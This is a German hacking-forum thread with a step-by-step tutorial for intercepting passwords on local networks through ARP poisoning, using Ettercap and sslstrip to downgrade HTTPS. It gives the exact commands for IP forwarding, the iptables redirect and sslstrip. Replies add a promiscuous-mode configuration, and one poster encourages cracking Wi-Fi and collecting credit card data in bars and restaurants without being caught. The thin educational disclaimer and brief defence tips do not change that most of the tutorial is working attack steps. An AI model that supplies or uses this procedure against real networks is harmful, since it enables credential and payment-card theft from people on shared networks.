12 Antworten in diesem Thema

[Xenio]

Hallo,

Hier mal ein Tutorial wie man im lokalen Netzwerk Passwörter mit "Ettercap" auslesen kann.
Man kann unverschlüsselte (http) als auch verschlüsselte Passwörter (https) auslesen.
Für die verschlüsselte Verbindungen braucht man noch das Tool "sslstrip".
Die Tools kann man aber auf jeder Linux Distribution installieren und benutzen. Ich empfehle jedoch Kali Linux oder Backtrack, da die nötigen Tools wie Ettercap und sslstrip bereits installiert sind.
Da Ettercap ein sehr mächtiges Tool ist, gibt es verschiedene Angriffsszenarien. Ich werde euch heute "Arp-Poisoning" zeigen.

WARNUNG: Dieses Tutorial soll nur zur Aufklärung dienen... Ich will im Grunde nur zeigen wie einfach es für einen Angreiffer ist, Passwörter in öffentlichen Netzwerken (Arbeit, Schulen, Internetcaf?©s etc.) zu sniffen. So werde ich die Konfiguration von Ettercap nicht* weiter erklären, um Script-Kiddies das Leben etwas zu erschweren. Man kann die Konfiguration von Ettercap eh überall im Netz finden...

Tool Beschreibung

1. Interface checken und den Standart-Gateway notieren (192.168.x.x) Im Terminal -> "ifconfig" eingeben 2. Backtrack Host in IP-Forwarding Modus setzen -> "echo 1 > /proc/sys/net/ipv4/ip_forward" 3. etter.conf Datei konfigurieren (UID & Iptables) -> Die Datei "etter.conf" konfigurieren* 5. Iptables konfigurieren um die HTTP Datenströme zum sslstrip umzuleiten - Ethernet -> iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000 - oder Wlan -> iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000 6. sslstrip starten -> sslstrip -a -k -f -l 10000 7. Ettercap-GTK starten (Neues Terminal öffnen) -> ettercap -G 8. Sniffing im Subnetz starten Sniff -> Unified sniffing 9. Interface auswählen - eth0 - wlan0 - ... 10. Hosts scannen Hosts -> Scan for hosts 11. gefundene Hosts x hosts added to the hosts list 12. gefundene Hosts auflisten x Hosts -> Hosts list 13. Target auswählen => Methode A (Gateway + bestimmter Rechner) - Target 1 auswählen (Gateway) Host 1/AP IP-192.168.x.x auswählen & Add to Target 1 drücken - Target 2 auswählen (Opfer-PC)** Host 2/Opfer-PC IP-192.168.x.y auswählen & Add to Target 2 drücken => Methode B (Gesamtes Netzwerk belauschen) - Kein Target auswählen und mit Punkt 14 weiterfahren 14. Man-in-the-Middle Attacke & ARP-Poisoning starten Mitm -> Arp poisoning 15. Parameter auswählen Sniff remote connections auswählen & OK drücken *Man kann die Konfiguration von Ettercap eh überall im Netz finden... **(Opfer-PC) Die Adresse des Rechners müsst ihr natürlich kennen .

Sobald jemand sich irgendwo über ein Login-Script einloggt, bekommt man das in Ettercap mit. Username und Passwort werden als Text ausgegen.
Bei HTTPS-Verbindungen, werden diese dank "sslstrip" in HTTP umgewandelt und man bekommt das Passwort trotzdem...
Wenn man Details über eine bestimmte Verbindungen möchte, kann er dies über "View/Connections" tun.

Wie bemerke ich dass jemand snifft?
Wenn man in der Konsole "ifconfig" eingibt, bekommt man den Standartgateway angewiesen.
Normal sollte es nur ein Standartgateway geben. Sollte es mehrere sein, sollte man das Netzwerk vermeiden bzw. über ein VPN-Tunnel sollte man der Attacke entgehen können.

Fazit/Empfehlung:
Wenn ihr öffentliche Netzwerke nutzt, loggt euch nicht in Accounts ein, die extrem sensible Daten und Informationen beinhalten. Logisch

MfG Xenio

[noxx]

Jemand erfahrung damit ?

ICQ:1337991 !

[noxx]

Habe eine Kali distri vmware, kriege ich ettercap jedoch keinen Traffic herrein.

Hab glaub ich echt schon einiges durch

Versucche gerade per eth0 über bridget etwas zum laufen zu bekommen.
Kriege es per wlan0 nicht hin.

[CyberFlash]

Ich denke ma das die Kinder e alle auf Windows online sind..
somit werden sie wohl eher zu dem Programm "Cain & Abel" greiffen,wo man eigentlich echt nix wissen muss um eine Arp durchzu führen.
Ansonsten ganz nettes Tut, danke

[dev-0]

hi noxx

du musst deine Netzwerk karte noch in den promiscuous mode setzen

auto eth0
iface eth0 inet manual
up ifconfig $IFACE 192.168.1.100 up
up ip link set $IFACE promisc on

so sollts dann klappen

gruss

[smc2014]

Ich schliesse mich CyberFlash an und empfehle Cain&Abel. Sehr einfach zu pflegen und erfolgreich!!

[Xenio]

Ich denke ma das die Kinder e alle auf Windows online sind..
somit werden sie wohl eher zu dem Programm "Cain & Abel" greiffen,wo man eigentlich echt nix wissen muss um eine Arp durchzu führen.
Ansonsten ganz nettes Tut, danke

Letztes Jahr gab es ja mal einen Hack im EU-Parlament, wo jemand den EU-Abgeordneten die Zugangsdaten deren E-Mail Adressen gestohlen hatte. Ein Insider berichtete, dass dieser Hack über eine MITM-Attacke mit Hilfe Ettercaps erfolgte.

Cain&Abel ist natürlich auch sehr mächtig, da es noch andere Hacking/Cracking & Sniffing Werkzeuge an Board hat. Jedoch schlägt sich Ettercap bei ARP Poisoning um Welten besser, da man noch mehr Angriffsmöglichkeiten hat. Zb: SSL Strip zum https-Sniffen, oder dieses social engineering Toolkit mitdem mat eine Webseite im lokalen Netzwerk auf eine Phishingseite umleiten kann. etc. etc. etc.

MfG Xenio

Bearbeitet von Xenio, 03 September 2014 - 18:36 Uhr.

[CyberFlash]

Letztes Jahr gab es ja mal einen Hack im EU-Parlament, wo jemand den EU-Abgeordneten die Zugangsdaten deren E-Mail Adressen gestohlen hatte. Ein Insider berichtete, dass dieser Hack über eine MITM-Attacke mit Hilfe Ettercaps erfolgte.

Cain&Abel ist natürlich auch sehr mächtig, da es noch andere Hacking/Cracking & Sniffing Werkzeuge an Board hat. Jedoch schlägt sich Ettercap bei ARP Poisoning um Welten besser, da man noch mehr Angriffsmöglichkeiten hat. Zb: SSL Strip zum https-Sniffen, oder dieses social engineering Toolkit mitdem mat eine Webseite im lokalen Netzwerk auf eine Phishingseite umleiten kann. etc. etc. etc.

MfG Xenio

Da hast du natürlich recht!
Mir ging es in meinem 1. Post eigentlich um folgende Aussage im Tut :

So werde ich die Konfiguration von Ettercap nicht* weiter erklären, um Script-Kiddies das Leben etwas zu erschweren. Man kann die Konfiguration von Ettercap eh überall im Netz finden..

[Xenio]

Hatte ich schon verstanden
Da die meisten Websites heute aber auf HTTPS setzen, werden die Kinder mit Cain&Abel nicht viel erfolg haben...
Aber auch die MITM-Attacken mit Ettercap können abgewehrt werden. Tools wie HTTPS Everywhere, No-script, und natürlich ein bisschen Verstand sollten genügen

MfG Xenio

Bearbeitet von Xenio, 04 September 2014 - 11:54 Uhr.

[noxx]

"
auto eth0
iface eth0 inet manual
up ifconfig $IFACE 192.168.1.100 up
up ip link set $IFACE promisc on

so sollts dann klappen

gruss "




kann mir das jmnd erläutern ?

[corkscrew]

Standardmäßig liest deine Netzwerkkarte nur die Pakete, die auch an sie adressiert sind. wenn du also zum Beispiel in einem Firmennetzwerk sitzt und jemand von außen an den Webserver will, dann bekommt dein PC auch diese Anfrage, ignoriert sie aber, weil sie an den Webserver adressiert ist.
Im promiscuous mode wird das ignorieren ausgeschaltet, du kannst also alle Pakete auffangen und anschauen.

ettercap empfängt also nichts, weil der PC keine Pakete empfängt, bzw diese ignoriert.

[XoiL]

Aus eigener Erfahrung kann ich euch sagen das Proggs wie C&A usw alle immer tota toll sind und auch viele bunte Knoepfe haben... bei C&A der PWN Button (arp sniffer) aber die Technik dahinter verstehen bringt in den meisten Faellen den Erfolg. Im Schulfach KLR bekommt ihr auch nur einen Punkt wenn Ihr die Formel kennt aber nichts einsetzen koennt ;>.

Ich empfehle ein Tux aufzusetzen und dort Aircrack-ng laufen zu lassen. Wenn das Netzwerk gehacked ist (was nicht das Problem sein sollte, koennt Ihr anfangen mit Man in the Middle Attacken. Dazu empfehle ich CTAS (catching the air stuff) oder ebenfalls den Sniffer von Aircrack-ng . Das Programm kann etwas mehr als nur scannen und cracken.

Wenn Ihr die Packete unverfaelscht bekommt koennt ihr unter anderem auch die weiterleitung zum Router einteilen und habt somit nur einen zwischestop. Apple Geräte merken übrigends wenn ihr C&A einschaltet und rumsnifft -> deswegen smart sein und sich net erwischen lassen. So lassen sich auch wunderbar CCs und alles weitere aus Kneipen / Restaurants usw sammeln...

Viel Spass in den letzten warmen tagen des altweiber Sommers.

Lg Xo